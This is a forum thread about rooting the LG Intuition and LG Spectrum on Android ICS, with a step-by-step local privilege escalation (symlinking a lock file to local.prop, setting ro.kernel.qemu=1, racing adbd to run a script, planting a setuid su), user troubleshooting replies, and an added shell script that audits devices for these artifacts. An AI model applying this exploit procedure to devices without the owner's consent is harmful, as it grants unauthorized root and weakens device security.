[ROOT] LG Intuition & LG Spectrum ICS


jcase

Retired Forum Mod / Senior Recognized Developer
Source: http://www.androidpolice.com/2012/0...root-the-lg-intuition-and-lg-spectrum-on-ics/

If you find this useful please follow me (jcase) on twitter ( https://twitter.com/teamandirc/ ).

Here you go, root for both the new LG Intuition and the LG Spectrum running ICS. The vulnerability is a simple permission bug allowing us to set up a symlink to local.prop (yes, yet again). While the bug is the same, the procedure is slightly different, so I will have the instructions separate.

With the LG Intuition, they did seem to attempt to mitigate this attack. Not by setting correct permissions, but by dropping adbD to the shell user if it runs as root, even if ro.kernel.qemu=1 is set. They failed; they give us enough time to run one command before dropping the root privileges, in our case a script to root the phone.

LG Spectrum ICS Root (for the leaked ICS rom):
Expect this to be patched in the release rom. Leaked ICS rom has locked bootloaders, i.e. no recovery at this point.

Files needed:
su ( http://dl.dropbox.com/u/8699733/lgroot/su )

adb shell

$ rm /data/vpnch/vpnc_starter_lock
$ ln -s /data/local.prop /data/vpnch/vpnc_starter_lock
$ exit

adb reboot

adb wait-for-device shell

$ echo 'ro.kernel.qemu=1' > /data/local.prop
$ exit

adb reboot

adb wait-for-device remount
adb push su /system/xbin/su
adb shell

# chown 0.0 /system/xbin/su
# chmod 06755 /system/xbin/su
# rm /data/local.prop
# rm /data/vpnch/vpnc_starter_lock
# reboot

Once rebooted, install Superuser from the market and enjoy.

LG Intuition Root

Files needed:
su ( http://dl.dropbox.com/u/8699733/lgroot/su )
lgroot.sh ( http://dl.dropbox.com/u/8699733/lgroot/lgroot.sh )

adb push su /data/local/tmp/su
adb push lgroot.sh /data/local/tmp/lgroot.sh

adb shell

$ chmod 777 /data/local/tmp/lgroot.sh
$ rm /data/vpnch/vpnc_starter_lock
$ ln -s /data/local.prop /data/vpnch/vpnc_starter_lock
$ exit

adb reboot

You may have to unplug/replug your phone to get some computers to pick it up again after this reboot.

adb wait-for-device shell

$ echo 'ro.kernel.qemu=1' > /data/local.prop
$ exit

Here is the important part, you will have to execute the next two commands one after the other. We want the second command to be fired off as soon as adbD comes up, before it drops root privileges. This may take a few minutes, and after the second command is complete you may have to unplug/replug your phone to get your computer to see it again.

adb reboot
adb wait-for-device /data/local/tmp/lgroot.sh

(Here is where you may have to unplug/replug, but only after the second command has run).

adb wait-for-device shell


$ su
# rm /data/local.prop
# rm /data/vpnch/vpnc_starter_lock
# reboot

Once rebooted, install Superuser from the market and enjoy.
 
Last edited:
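
For anyone auditing a device or an extracted image rather than rooting one: the post above leaves three things on disk, namely a local.prop that sets ro.kernel.qemu=1, a symlink under /data that points at local.prop, and a setuid su in the system partition. The script below is an added example, not part of jcase's post or of lgroot.sh; the function name, the output tags and the world-writable-directory check are assumptions made for illustration.

```shell
#!/bin/sh
# Added example, not from the thread: list on-disk artifacts of the
# local.prop symlink technique. ROOT is "/" on a device or the path of an
# extracted filesystem image. Names and output tags are made up here.

audit_localprop() {
    root=${1%/}
    prop="$root/data/local.prop"

    # local.prop carrying the emulator flag: per the post, this is the
    # property that lets adbd come up as root.
    if [ -f "$prop" ] &&
       grep -Eq '^[[:space:]]*ro\.kernel\.qemu[[:space:]]*=[[:space:]]*1' "$prop"; then
        echo "qemu-flag $prop"
    fi

    # Symlinks under /data that point at local.prop. A privileged process
    # that opens or chmods the linked path acts on local.prop instead.
    find "$root/data" -type l 2>/dev/null | while IFS= read -r link; do
        case "$(readlink "$link")" in
            /data/local.prop|"$prop")
                echo "symlink $link"
                # Assumption: the permission bug shows up as a directory
                # writable by "other", so unprivileged users can swap files.
                dir=$(dirname "$link")
                case "$(ls -ld "$dir")" in
                    d???????w*) echo "world-writable-dir $dir" ;;
                esac
                ;;
        esac
    done

    # A setuid su left in the system partition.
    find "$root/system/xbin" "$root/system/bin" -type f -name su \
        -perm -4000 2>/dev/null |
        while IFS= read -r f; do echo "setuid-su $f"; done
}
```

Call it as audit_localprop / on a device shell or audit_localprop /path/to/extracted/image on a workstation; no output means none of the three artifacts were found.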

LostCauseSPM

Member
Thanks!

Dude, it has been killing me not having root since I managed to get the leaked ICS installed. But I tried this, and just wasn't having any luck. I tried to make a .bat file for it, no go. So I tried inputting it line by line and I keep getting hung up at the $ echo 'ro.kernel.qemu=1' part. Just wondering if anyone else is having this problem.
Also, since yesterday whenever I check for a software update, I'm getting an "error occurred during download". I was wondering if I would even be able to get the final ICS OTA when it finally is available.
Thanks again jcase!
 

jcase

Retired Forum Mod / Senior Recognized Developer
Dude, it has been killing me not having root since I managed to get the leaked ICS installed. But I tried this, and just wasn't having any luck. I tried to make a .bat file for it, no go. So I tried inputting it line by line and I keep getting hung up at the $ echo 'ro.kernel.qemu=1' part. Just wondering if anyone else is having this problem.
Also, since yesterday whenever I check for a software update, I'm getting an "error occurred during download". I was wondering if I would even be able to get the final ICS OTA when it finally is available.
Thanks again jcase!

Which specific ICS version do you have? I had a couple of different leaks to work with.
 

lahegry

Senior Member
Source: http://www.androidpolice.com/2012/0...root-the-lg-intuition-and-lg-spectrum-on-ics/


LG Intuition Root

Files needed:
su ( http://dl.dropbox.com/u/8699733/lgroot/su )
lgroot.sh ( http://dl.dropbox.com/u/8699733/lgroot/lgroot.sh )

adb push su /data/local/tmp/su
adb push lgroot.sh /data/local/tmp/lgroot.sh

adb shell

$ chmod 777 /data/local/tmp/lgroot.sh
$ rm /data/vpnch/vpnc_starter_lock
$ ln -s /data/local.prop /data/vpnch/vpnc_starter_lock
$ exit

adb reboot

You may have to unplug/replug your phone to get some computers to pick it up again after this reboot.

adb wait-for-device shell

$ echo ‘ro.kernel.qemu=1’ > /data/local.prop
$ exit

Here is the important part, you will have to execute the next two commands one after the other. We want the second command to be fired off as soon as adbD comes up, before it drops root privileges. This may take a few minutes, and after the second command is complete you may have to unplug/replug your phone to get your computer to see it again.

adb reboot
adb wait-for-device /data/local/tmp/lgroot.sh

(Here is where you may have to unplug/replug, but only after the second command has run).

adb wait-for-device shell


$ su
# rm /data/local.prop
# rm /data/vpnch/vpnc_starter_lock
# reboot
:crying:
Once rebooted, install Superuser from the market and enjoy.
I tried, but as soon as I entered adb shell it kicked me off and I haven't been able to try since.
 

LostCauseSPM

Member
Which specific ICS version do you have? I had a couple of different leaks to work with.

I've got the Spectrum, btw. Still trying to make a nice, clean, automated .bat, but it keeps failing now at the remount command.

---------- Post added at 07:37 PM ---------- Previous post was at 07:24 PM ----------

And now is saying "rm failed for /data/vpnch..."
When the remount fails, I get a "remount failed: operation not permitted" message.
Hope this is useful to you.
 

jcase

Retired Forum Mod / Senior Recognized Developer
I've got the Spectrum, btw. Still trying to make a nice, clean, automated .bat, but it keeps failing now at the remount command.

---------- Post added at 07:37 PM ---------- Previous post was at 07:24 PM ----------

And now is saying "rm failed for /data/vpnch..."
When the remount fails, I get a "remount failed: operation not permitted" message.
Hope this is useful to you.

Add jcase@cunninglogic.com to gtalk and hit me up.
 

LostCauseSPM

Member
So this is just what I've come up with tonight. The exploit still fails line by line, so I made a batch file just for that command, and I think I may be misunderstanding that "adb mount - o" command you recommended.
Wow, this chrome is NOT liking this txt box, keeps jumping backwards for some reason. C'mon Google...
 

arnshrty

Member
I've got the intuition and here is what I'm coming up with using cmd prompt in windows:

C:\android-sdk\platform-tools>adb push su /data/local/tmp/su
2642 KB/s (380532 bytes in 0.140s)

C:\android-sdk\platform-tools>adb push lgroot.sh /data/local/tmp/lgroot.sh
10 KB/s (164 bytes in 0.015s)

C:\android-sdk\platform-tools>adb shell
shell@android:/ $ chmod 777 /data/local/tmp/lgroot.sh
chmod 777 /data/local/tmp/lgroot.sh
shell@android:/ $ rm /data/vpnch/vpnc_starter_lock
rm /data/vpnch/vpnc_starter_lock
shell@android:/ $ ln -s /data/local.prop /data/vpnch/vpnc_starter_lock
ln -s /data/local.prop /data/vpnch/vpnc_starter_lock
shell@android:/ $ exit
exit

C:\android-sdk\platform-tools>adb reboot

C:\android-sdk\platform-tools>adb wait-for-device shell
shell@android:/ $ echo `ro.kernel.qemu=1' > /data/local.prop
echo `ro.kernel.qemu=1' > /data/local.prop
> exit
exit
> adb reboot
adb reboot
> adb wait-for-device /data/local/tmp/lgroot.sh
adb wait-for-device /data/local/tmp/lgroot.sh
> adb wait-for-device shell
adb wait-for-device shell
>

I believe I see where the mistake is, but don't know how to fix it.

---------- Post added 30th September 2012 at 12:02 AM ---------- Previous post was 29th September 2012 at 11:57 PM ----------

actually I don't see my mistake and I should be doing all this in PTP mode correct?
 

jcase

Retired Forum Mod / Senior Recognized Developer
Try now, something was altering my post

I've got the intuition and here is what I'm coming up with using cmd prompt in windows:

C:\android-sdk\platform-tools>adb push su /data/local/tmp/su
2642 KB/s (380532 bytes in 0.140s)

C:\android-sdk\platform-tools>adb push lgroot.sh /data/local/tmp/lgroot.sh
10 KB/s (164 bytes in 0.015s)

C:\android-sdk\platform-tools>adb shell
shell@android:/ $ chmod 777 /data/local/tmp/lgroot.sh
chmod 777 /data/local/tmp/lgroot.sh
shell@android:/ $ rm /data/vpnch/vpnc_starter_lock
rm /data/vpnch/vpnc_starter_lock
shell@android:/ $ ln -s /data/local.prop /data/vpnch/vpnc_starter_lock
ln -s /data/local.prop /data/vpnch/vpnc_starter_lock
shell@android:/ $ exit
exit

C:\android-sdk\platform-tools>adb reboot

C:\android-sdk\platform-tools>adb wait-for-device shell
shell@android:/ $ echo `ro.kernel.qemu=1' > /data/local.prop
echo `ro.kernel.qemu=1' > /data/local.prop
> exit
exit
> adb reboot
adb reboot
> adb wait-for-device /data/local/tmp/lgroot.sh
adb wait-for-device /data/local/tmp/lgroot.sh
> adb wait-for-device shell
adb wait-for-device shell
>

I believe I see where the mistake is, but don't know how to fix it.

---------- Post added 30th September 2012 at 12:02 AM ---------- Previous post was 29th September 2012 at 11:57 PM ----------

actually I don't see my mistake and I should be doing all this in PTP mode correct?
 

krapman

New member
Correction needed for Intuition

First of all, thank you!!!

For Intuition, where the 'important part' is, the second command returns an error.
I was able to succeed by running
adb reboot
adb wait-for-device shell
then wait for the # to appear, and quickly paste and execute:
/data/local/tmp/lgroot.sh

took a few tries, but I am rooted! :laugh:
 

davieslacker

Member
First of all, thank you!!!

For Intuition, where the 'important part' is, the second command returns an error.
I was able to succeed by running
adb reboot
adb wait-for-device shell
then wait for the # to appear, and quickly paste and execute:
/data/local/tmp/lgroot.sh

took a few tries, but I am rooted! :laugh:

Just wondering how you guys like this device? I was just debating on switching to verizon and this device stands out as the most interesting to me... so I had to look here to see if anybody rooted it.

Anybody try any different roms? or think there may be a Jelly Bean update for it?
 

pouxonu

Senior Member
/system/bin/sh su not found


Any help with this? I was having an issue with the echo command but got past that, but now it's giving me this error.
 
Last edited:

dedrics

Senior Member
Just wondering how you guys like this device? I was just debating on switching to verizon and this device stands out as the most interesting to me... so I had to look here to see if anybody rooted it.

Anybody try any different roms? or think there may be a Jelly Bean update for it?

It's an amazing device, I love it and I'm rooted. Used the steps above and it worked. I am sure it will get Jelly Bean love eventually. No ROMs yet. But LG added a lot of customization to the device from what developers usually add as mods.
 

chavist

Senior Member
Will there be a single-click method for root on the Intuition? I can't seem to get this method to work.
 

LostCauseSPM

Member
Exploit still works on the final version of ICS for the LG Spectrum

Just updated my phone. Couldn't wait for the OTA rollout, updated via the Verizon Wireless Update Util on my comp. Root worked no problem. Thanks again Jcase!
 

    1
    https://dl.dropbox.com/u/54418871/Intuition Dump.7z

    LG Intuition system dump. I'm not sure if this is the system img that you need or not. This came from the user arnshrty here at xda
    Sent from my VS950 4G using xda app-developers app
    1
    Fast question!

    If I format my phone, can I just install superuser again and that would be all, or must I follow these steps again?

    ---------- Post added at 09:28 PM ---------- Previous post was at 09:24 PM ----------

    I found the factory cab file for the LG Intuition, had to authenticate against the website and fool it to check as a device requesting an update for it to give up the location of the file since you can not browse direct.
    Maybe this will help with further development since we should now be able to restore to factory in case of a mishap.

    Link to download the file from LG servers (get it before it disappears) FILE is around 837mbs

    http://csmgdl.lgmobile.com/swdata/WEBSW/LGVS950/AVRZBK/VS95010B_00/VS95010B_00.S10B_00.P58015.R5.cab

    Man, can you tell how to flash this CAB file? I'm really new to this device and wanna update it to jelly bean, hope your fast answer :fingers-crossed: